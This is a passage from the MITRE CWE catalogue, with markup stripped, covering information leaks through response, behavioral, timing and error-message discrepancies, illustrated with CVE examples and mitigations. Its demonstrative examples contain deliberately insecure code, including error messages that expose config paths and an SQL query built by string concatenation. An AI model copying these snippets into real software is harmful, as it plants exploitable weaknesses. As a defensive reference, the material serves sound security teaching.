https://www.cve.org/CVERecord?id=CVE-2002-0515 + + + CVE-2001-1387 + Product may generate different responses than specified by the administrator, possibly leading to an information leak. + https://www.cve.org/CVERecord?id=CVE-2001-1387 + + + CVE-2004-0778 + Version control system allows remote attackers to determine the existence of arbitrary files and directories via the -X command for an alternate history file, which causes different error messages to be returned. + https://www.cve.org/CVERecord?id=CVE-2004-0778 + + + CVE-2004-1428 + FTP server generates an error message if the user name does not exist instead of prompting for a password, which allows remote attackers to determine valid usernames. + https://www.cve.org/CVERecord?id=CVE-2004-1428 + + + + + Response discrepancy infoleak + + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + can overlap errors related to escalated privileges + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Relationship_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Description, Potential_Mitigations + + + CWE Content Team + MITRE + 2009-12-28 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2010-09-27 + updated Description, Name, Observed_Examples + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Demonstrative_Examples, Observed_Examples, References, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2020-02-24 + updated Description, Name, Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2023-01-31 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Response Discrepancy Information Leak + Response Discrepancy Information Exposure + + + + The product's behaviors indicate important differences that may be observed by unauthorized actors in a way that reveals (1) its internal state or decision process, or (2) differences from other products with equivalent functionality. + + Ideally, a product should provide as little information about its internal operations as possible. Otherwise, attackers could use knowledge of these internal operations to simplify or optimize their attack. In some cases, behavioral discrepancies can be used by attackers to form a side channel. + + + + + + + + + + Architecture and Design + + + Implementation + + + + + Confidentiality + Access Control + Read Application Data + Bypass Protection Mechanism + + + + + CVE-2002-0208 + Product modifies TCP/IP stack and ICMP error messages in unusual ways that show the product is in use. + https://www.cve.org/CVERecord?id=CVE-2002-0208 + + + CVE-2004-2252 + Behavioral infoleak by responding to SYN-FIN packets. + https://www.cve.org/CVERecord?id=CVE-2004-2252 + + + + + Behavioral Discrepancy Infoleak + + + 45 + Fingerprinting + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Description + + + CWE Content Team + MITRE + 2009-12-28 + updated Description, Name + + + CWE Content Team + MITRE + 2010-02-16 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2020-02-24 + updated Description, Name, Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Behavioral Discrepancy Information Leak + Information Exposure Through Behavioral Discrepancy + + + + The product performs multiple behaviors that are combined to produce a single result, but the individual behaviors are observable separately in a way that allows attackers to reveal internal state or internal decision points. + + Ideally, a product should provide as little information as possible to an attacker. Any hints that the attacker may be making progress can then be used to simplify or optimize the attack. For example, in a login procedure that requires a username and password, ultimately there is only one decision: success or failure. However, internally, two separate actions are performed: determining if the username exists, and checking if the password is correct. If the product behaves differently based on whether the username exists or not, then the attacker only needs to concentrate on the password. + + + + + + + + + + Architecture and Design + + + Implementation + + + + + Confidentiality + Access Control + Read Application Data + Bypass Protection Mechanism + + + + + Setup generic response pages for error conditions. The error page should not disclose information about the success or failure of a sensitive operation. For instance, the login page should not confirm that the login is correct and the password incorrect. The attacker who tries random account name may be able to guess some of them. Confirming that the account exists would make the login page more susceptible to brute force attack. + + + + + CVE-2002-2031 + File existence via infoleak monitoring whether "onerror" handler fires or not. + https://www.cve.org/CVERecord?id=CVE-2002-2031 + + + CVE-2005-2025 + Valid groupname enumeration via behavioral infoleak (sends response if valid, doesn't respond if not). + https://www.cve.org/CVERecord?id=CVE-2005-2025 + + + CVE-2001-1497 + Behavioral infoleak in GUI allows attackers to distinguish between alphanumeric and non-alphanumeric characters in a password, thus reducing the search space. + https://www.cve.org/CVERecord?id=CVE-2001-1497 + + + CVE-2003-0190 + Product immediately sends an error message when user does not exist instead of waiting until the password is provided, allowing username enumeration. + https://www.cve.org/CVERecord?id=CVE-2003-0190 + + + + + Internal behavioral inconsistency infoleak + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-03-29 + updated Name + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2020-02-24 + updated Description, Name, Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Internal Behavioral Inconsistency Information Leak + Information Exposure of Internal State Through Behavioral Inconsistency + + + + The product operates in an environment in which its existence or specific identity should not be known, but it behaves differently than other products with equivalent functionality, in a way that is observable to an attacker. + + For many kinds of products, multiple products may be available that perform the same functionality, such as a web server, network interface, or intrusion detection system. Attackers often perform "fingerprinting," which uses discrepancies in order to identify which specific product is in use. Once the specific product has been identified, the attacks can be made more customized and efficient. Often, an organization might intentionally allow the specific product to be identifiable. However, in some environments, the ability to identify a distinct product is unacceptable, and it is expected that every product would behave in exactly the same way. In these more restricted environments, a behavioral difference might pose an unacceptable risk if it makes it easier to identify the product's vendor, model, configuration, version, etc. + + + + + + + + + + Architecture and Design + + + Implementation + + + + + Confidentiality + Access Control + Read Application Data + Bypass Protection Mechanism + + + + + CVE-2002-0208 + Product modifies TCP/IP stack and ICMP error messages in unusual ways that show the product is in use. + https://www.cve.org/CVERecord?id=CVE-2002-0208 + + + CVE-2004-2252 + Behavioral infoleak by responding to SYN-FIN packets. + https://www.cve.org/CVERecord?id=CVE-2004-2252 + + + CVE-2000-1142 + Honeypot generates an error with a "pwd" command in a particular directory, allowing attacker to know they are in a honeypot system. + https://www.cve.org/CVERecord?id=CVE-2000-1142 + + + + + External behavioral inconsistency infoleak + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-12-28 + updated Description, Name + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2020-02-24 + updated Description, Name, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + External Behavioral Inconsistency Information Leak + Information Exposure Through an External Behavioral Inconsistency + + + + Two separate operations in a product require different amounts of time to complete, in a way that is observable to an actor and reveals security-relevant information about the state of the product, such as whether a particular operation was successful or not. + + In security-relevant contexts, even small variations in timing can be exploited by attackers to indirectly infer certain details about the product's internal operations. For example, in some cryptographic algorithms, attackers can use timing differences to infer certain properties about a private key, making the key easier to guess. Timing discrepancies effectively form a timing side channel. + + + + + + + + + + + + Architecture and Design + COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic. + + + Implementation + + + Operation + + + + + Confidentiality + Access Control + Read Application Data + Bypass Protection Mechanism + + + + + CVE-2019-10482 + Smartphone OS uses comparison functions that are not in constant time, allowing side channels + https://www.cve.org/CVERecord?id=CVE-2019-10482 + + + CVE-2014-0984 + Password-checking function in router terminates validation of a password entry when it encounters the first incorrect character, which allows remote attackers to obtain passwords via a brute-force attack that relies on timing differences in responses to incorrect password guesses, aka a timing side-channel attack. + https://www.cve.org/CVERecord?id=CVE-2014-0984 + + + CVE-2003-0078 + SSL implementation does not perform a MAC computation if an incorrect block cipher padding is used, which causes an information leak (timing discrepancy) that may make it easier to launch cryptographic attacks that rely on distinguishing between padding and MAC verification errors, possibly leading to extraction of the original plaintext, aka the "Vaudenay timing attack." + https://www.cve.org/CVERecord?id=CVE-2003-0078 + + + CVE-2000-1117 + Virtual machine allows malicious web site operators to determine the existence of files on the client by measuring delays in the execution of the getSystemResource method. + https://www.cve.org/CVERecord?id=CVE-2000-1117 + + + CVE-2003-0637 + Product uses a shorter timeout for a non-existent user than a valid user, which makes it easier for remote attackers to guess usernames and conduct brute force password guessing. + https://www.cve.org/CVERecord?id=CVE-2003-0637 + + + CVE-2003-0190 + Product immediately sends an error message when a user does not exist, which allows remote attackers to determine valid usernames via a timing attack. + https://www.cve.org/CVERecord?id=CVE-2003-0190 + + + CVE-2004-1602 + FTP server responds in a different amount of time when a given username exists, which allows remote attackers to identify valid usernames by timing the server response. + https://www.cve.org/CVERecord?id=CVE-2004-1602 + + + CVE-2005-0918 + Browser allows remote attackers to determine the existence of arbitrary files by setting the src property to the target filename and using Javascript to determine if the web page immediately stops loading, which indicates whether the file exists or not. + https://www.cve.org/CVERecord?id=CVE-2005-0918 + + + + Cryptography + Authentication + + + + Timing discrepancy infoleak + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + Often primary in cryptographic applications and algorithms. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Relationship_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Description + + + CWE Content Team + MITRE + 2010-09-27 + updated Relationships + + + CWE Content Team + MITRE + 2011-03-29 + updated Name + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2014-06-23 + updated Other_Notes, Related_Attack_Patterns + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-05-03 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Description, Name, Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2023-04-27 + updated Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Timing Discrepancy Information Leak + Information Exposure Through Timing Discrepancy + + + + The product generates an error message that includes sensitive information about its environment, users, or associated data. + The sensitive information may be valuable information on its own (such as a password), or it may be useful for launching other, more serious attacks. The error message may be created in different ways: + + self-generated: the source code explicitly constructs the error message and delivers it + externally-generated: the external environment, such as a language interpreter, handles the error and constructs its own message, whose contents are not under direct control by the programmer + + An attacker may use the contents of error messages to help launch another, more focused attack. For example, an attempt to exploit a path traversal weakness (CWE-22) might yield the full pathname of the installed application. In turn, this could be used to select the proper number of ".." sequences to navigate to the targeted file. An attack using SQL injection (CWE-89) might not initially succeed, but an error message could reveal the malformed query, which would expose query logic and possibly even passwords or other sensitive information used within the query. + + + + + + + + Primary + + + Resultant + + + + + + + + + + Architecture and Design + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + System Configuration + + + Operation + + + High + + + Confidentiality + Read Application Data + Often this will either reveal sensitive information which may be used for a later attack or private information stored in the server. + + + + + Manual Analysis + This weakness generally requires domain-specific interpretation using manual analysis. However, the number of potential error conditions may be too large to cover completely within limited time constraints. + High + + + Automated Analysis + Automated methods may be able to detect certain idioms automatically, such as exposed stack traces or pathnames, but violation of business rules or privacy requirements is not typically feasible. + Moderate + + + Automated Dynamic Analysis + + This weakness can be detected using dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software's operation may slow down, but it should not become unstable, crash, or generate incorrect results. + Error conditions may be triggered with a stress-test by calling the software simultaneously from a large number of threads or processes, and look for evidence of any unexpected behavior. + + Moderate + + + Manual Dynamic Analysis + Identify error conditions that are not likely to occur during normal usage and trigger them. For example, run the program under low memory conditions, run with insufficient privileges or permissions, interrupt a transaction before it is completed, or disable connectivity to basic network services such as DNS. Monitor the software for any unexpected behavior. If you trigger an unhandled exception or similar error that was discovered and handled by the application's environment, it may still indicate unexpected conditions that were not handled by the application itself. + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + + + + + Implementation + + Ensure that error messages only contain minimal details that are useful to the intended audience and no one else. The messages need to strike the balance between being too cryptic (which can confuse users) or being too detailed (which may reveal more than intended). The messages should not reveal the methods that were used to determine the error. Attackers can use detailed information to refine or optimize their original attack, thereby increasing their chances of success. + If errors must be captured in some detail, record them in log messages, but consider what could occur if the log messages can be viewed by attackers. Highly sensitive information such as passwords should never be saved to log files. + Avoid inconsistent messaging that might accidentally tip off an attacker about internal state, such as whether a user account exists or not. + + + + Implementation + Handle exceptions internally and do not display errors containing potentially sensitive information to a user. + + + Implementation + Attack Surface Reduction + Use naming conventions and strong types to make it easier to spot when sensitive data is being used. When creating structures, objects, or other complex entities, separate the sensitive and non-sensitive data as much as possible. + Defense in Depth + This makes it easier to spot places in the code where data is being used that is unencrypted. + + + Implementation + Build and Compilation + Compilation or Build Hardening + Debugging information should not make its way into a production release. + + + Implementation + Build and Compilation + Environment Hardening + Debugging information should not make its way into a production release. + + + System Configuration + Where available, configure the environment to use less verbose error messages. For example, in PHP, disable the display_errors setting during configuration, or at runtime using the error_reporting() function. + + + System Configuration + Create default error pages or messages that do not leak any information. + + + + + In the following example, sensitive information might be printed depending on the exception that occurs. + + try {/.../}catch (Exception e) {System.out.println(e);} + + If an exception related to SQL is handled by the catch, then the output might contain sensitive information such as SQL query structure or private information. If this output is redirected to a web user, this may represent a security problem. + + + This code tries to open a database connection, and prints any exceptions that occur. + + try {openDbConnection();} + //print exception message that includes exception message and configuration file location + catch (Exception $e) {echo 'Caught exception: ', $e->getMessage(), '\n';echo 'Check credentials in config file at: ', $Mysql_config_location, '\n';} + + If an exception occurs, the printed message exposes the location of the configuration file the script is using. An attacker can use this information to target the configuration file (perhaps exploiting a Path Traversal weakness). If the file can be read, the attacker could gain credentials for accessing the database. The attacker may also be able to replace the file with a malicious one, causing the application to use an arbitrary database. + + + The following code generates an error message that leaks the full pathname of the configuration file. + + $ConfigDir = "/home/myprog/config";$uname = GetUserInput("username"); + + # avoid CWE-22, CWE-78, others. + ExitError("Bad hacker!") if ($uname !~ /^\w+$/);$file = "$ConfigDir/$uname.txt";if (! (-e $file)) {ExitError("Error: $file does not exist");}... + + If this code is running on a server, such as a web application, then the person making the request should not know what the full pathname of the configuration directory is. By submitting a username that does not produce a $file that exists, an attacker could get this pathname. It could then be used to exploit path traversal or symbolic link following problems that may exist elsewhere in the application. + + + In the example below, the method getUserBankAccount retrieves a bank account object from a database using the supplied username and account number to query the database. If an SQLException is raised when querying the database, an error message is created and output to a log file. + + public BankAccount getUserBankAccount(String username, String accountNumber) { + BankAccount userAccount = null;String query = null;try {if (isAuthorizedUser(username)) {query = "SELECT * FROM accounts WHERE owner = "+ username + " AND accountID = " + accountNumber;DatabaseManager dbManager = new DatabaseManager();Connection conn = dbManager.getConnection();Statement stmt = conn.createStatement();ResultSet queryResult = stmt.executeQuery(query);userAccount = (BankAccount)queryResult.getObject(accountNumber);}} catch (SQLException ex) {String logMessage = "Unable to retrieve account information from database,\nquery: " + query;Logger.getLogger(BankManager.class.getName()).log(Level.SEVERE, logMessage, ex);}return userAccount; + } + + The error message that is created includes information about the database query that may contain sensitive information about the database or query logic. In this case, the error message will expose the table name and column names used in the database. This data could be used to simplify other attacks, such as SQL injection (CWE-89) to directly access the database. + + + + + CVE-2008-2049 + POP3 server reveals a password in an error message after multiple APOP commands are sent. Might be resultant from another weakness. + https://www.cve.org/CVERecord?id=CVE-2008-2049 + + + CVE-2007-5172 + Program reveals password in error message if attacker can trigger certain database errors. + https://www.cve.org/CVERecord?id=CVE-2007-5172 + + + CVE-2008-4638 + Composite: application running with high privileges (CWE-250) allows user to specify a restricted file to process, which generates a parsing error that leaks the contents of the file (CWE-209). + https://www.cve.org/CVERecord?id=CVE-2008-4638 + + + CVE-2008-1579 + Existence of user names can be determined by requesting a nonexistent blog and reading the error message. + https://www.cve.org/CVERecord?id=CVE-2008-1579 + + + CVE-2007-1409 + Direct request to library file in web application triggers pathname leak in error message. + https://www.cve.org/CVERecord?id=CVE-2007-1409 + + + CVE-2008-3060 + Malformed input to login page causes leak of full path when IMAP call fails. + https://www.cve.org/CVERecord?id=CVE-2008-3060 + + + CVE-2005-0603 + Malformed regexp syntax leads to information exposure in error message. + https://www.cve.org/CVERecord?id=CVE-2005-0603 + + + CVE-2017-9615 + verbose logging stores admin credentials in a world-readablelog file + https://www.cve.org/CVERecord?id=CVE-2017-9615 + + + CVE-2018-1999036 + SSH password for private key stored in build log + https://www.cve.org/CVERecord?id=CVE-2018-1999036 + + + + + Accidental leaking of sensitive information through error messages + + + A6 + Information Leakage and Improper Error Handling + CWE More Specific + + + A7 + Improper Error Handling + CWE More Specific + + + A10 + Insecure Configuration Management + CWE More Specific + + + ERR01-J + Do not allow exceptions to expose sensitive information + + + SFP23 + Exposed Data + + + + + + + + + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CLASP + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + Veracode + 2008-08-15 + Suggested OWASP Top Ten 2004 mapping + + + CWE Content Team + MITRE + 2008-09-08 + updated Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Relationships + + + CWE Content Team + MITRE + 2009-01-12 + updated Demonstrative_Examples, Description, Name, Observed_Examples, Other_Notes, Potential_Mitigations, Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2009-03-10 + updated Demonstrative_Examples, Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2009-12-28 + updated Demonstrative_Examples, Name, Potential_Mitigations, References, Time_of_Introduction + + + CWE Content Team + MITRE + 2010-02-16 + updated Detection_Factors, References, Relationships + + + CWE Content Team + MITRE + 2010-04-05 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2010-06-21 + updated Common_Consequences, Detection_Factors, Potential_Mitigations, References + + + Veracode + 2010-09-09 + Suggested OWASP Top Ten mapping + + + CWE Content Team + MITRE + 2010-09-27 + updated Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2011-03-29 + updated Demonstrative_Examples, Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-27 + updated Relationships + + + CWE Content Team + MITRE + 2011-09-13 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated References, Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2013-07-17 + updated References + + + CWE Content Team + MITRE + 2014-06-23 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Modes_of_Introduction, References, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2018-03-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2019-01-03 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships + + + CWE Content Team + MITRE + 2019-09-19 + updated Demonstrative_Examples, Observed_Examples + + + CWE Content Team + MITRE + 2020-02-24 + updated Applicable_Platforms, Description, Name, Observed_Examples, References, Relationships, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2020-12-10 + updated Potential_Mitigations, Related_Attack_Patterns + + + CWE Content Team + MITRE + 2021-07-20 + updated Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + Nick Johnston + 2022-07-11 + Identified incorrect language tag in demonstrative example. + + Error Message Information Leaks + Error Message Information Leak + Information Exposure Through an Error Message + + + + The product identifies an error condition and creates its own diagnostic or error messages that contain sensitive information. + + + + + + + + + Architecture and Design + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + + + Confidentiality + Read Application Data + + + + + Implementation + Build and Compilation + Compilation or Build Hardening + Debugging information should not make its way into a production release. + + + Implementation + Build and Compilation + Environment Hardening + Debugging information should not make its way into a production release. + + + + + The following code uses custom configuration files for each user in the application. It checks to see if the file exists on the system before attempting to open and use the file. If the configuration file does not exist, then an error is generated, and the application exits. + + $uname = GetUserInput("username"); + + + # avoid CWE-22, CWE-78, others. + if ($uname !~ /^\w+$/){ExitError("Bad hacker!") ;} + $filename = "/home/myprog/config/" . $uname . ".txt";if (!(-e $filename)){ExitError("Error: $filename does not exist");} + + If this code is running on a server, such as a web application, then the person making the request should not know what the full pathname of the configuration directory is. By submitting a username that is not associated with a configuration file, an attacker could get this pathname from the error message. It could then be used to exploit path traversal, symbolic link following, or other problems that may exist elsewhere in the application. + + + + + CVE-2005-1745 + Infoleak of sensitive information in error message (physical access required). + https://www.cve.org/CVERecord?id=CVE-2005-1745 + + + + + Product-Generated Error Message Infoleak + + + SFP23 + Exposed Data + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-12-28 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2010-06-21 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-03-29 + updated Name, Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated References, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Name, Potential_Mitigations + + + CWE Content Team + MITRE + 2014-06-23 + updated Other_Notes + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Functional_Areas, Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Name, Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Product-Generated Error Message Information Leak + Information Exposure Through Generated Error Message + Information Exposure Through Self-generated Error Message + + + + The product performs an operation that triggers an external diagnostic or error message that is not directly generated or controlled by the product, such as an error generated by the programming language interpreter that a software application uses. The error can contain sensitive system information. + + + + + + Resultant + + + + + + + + + Architecture and Design + PHP applications are often targeted for having this issue when the PHP interpreter generates the error outside of the application's control. However, other languages/environments exhibit the same issue. + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + Operation + + + + + Confidentiality + Read Application Data + + + + + System Configuration + Configure the application's environment in a way that prevents errors from being generated. For example, in PHP, disable display_errors. + + + Implementation + Build and Compilation + Compilation or Build Hardening + Debugging information should not make its way into a production release. + + + Implementation + Build and Compilation + Environment Hardening + Debugging information should not make its way into a production release. + + + Implementation + Handle exceptions internally and do not display errors containing potentially sensitive information to a user. Create default error pages if necessary. + + + Implementation + The best way to prevent this weakness during implementation is to avoid any bugs that could trigger the external error message. This typically happens when the program encounters fatal errors, such as a divide-by-zero. You will not always be able to control the use of error pages, and you might not be using a language that handles exceptions. + + + + + CVE-2004-1581 + chain: product does not protect against direct request of an include file, leading to resultant path disclosure when the include file does not successfully execute. + https://www.cve.org/CVERecord?id=CVE-2004-1581 + + + CVE-2004-1579 + Single "'" inserted into SQL query leads to invalid SQL query execution, triggering full path disclosure. Possibly resultant from more general SQL injection issue. + https://www.cve.org/CVERecord?id=CVE-2004-1579 + + + CVE-2005-0459 + chain: product does not protect against direct request of a library file, leading to resultant path disclosure when the file does not successfully execute. + https://www.cve.org/CVERecord?id=CVE-2005-0459 + + + CVE-2005-0443 + invalid parameter triggers a failure to find an include file, leading to infoleak in error message. + https://www.cve.org/CVERecord?id=CVE-2005-0443 + + + CVE-2005-0433 + Various invalid requests lead to information leak in verbose error messages describing the failure to instantiate a class, open a configuration file, or execute an undefined function. + https://www.cve.org/CVERecord?id=CVE-2005-0433 + + + CVE-2004-1101 + Improper handling of filename request with trailing "/" causes multiple consequences, including information leak in Visual Basic error message. + https://www.cve.org/CVERecord?id=CVE-2004-1101 + + + + Error Handling + + + + Product-External Error Message Infoleak + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + This is inherently a resultant vulnerability from a weakness within the product or an interaction error. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Applicable_Platforms, Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Description + + + CWE Content Team + MITRE + 2008-11-24 + updated Description, Enabling_Factors_for_Exploitation, Functional_Areas, Observed_Examples, Other_Notes, Potential_Mitigations, Relationship_Notes, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2010-06-21 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2010-12-13 + updated Observed_Examples + + + CWE Content Team + MITRE + 2011-03-29 + updated Name + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Name + + + CWE Content 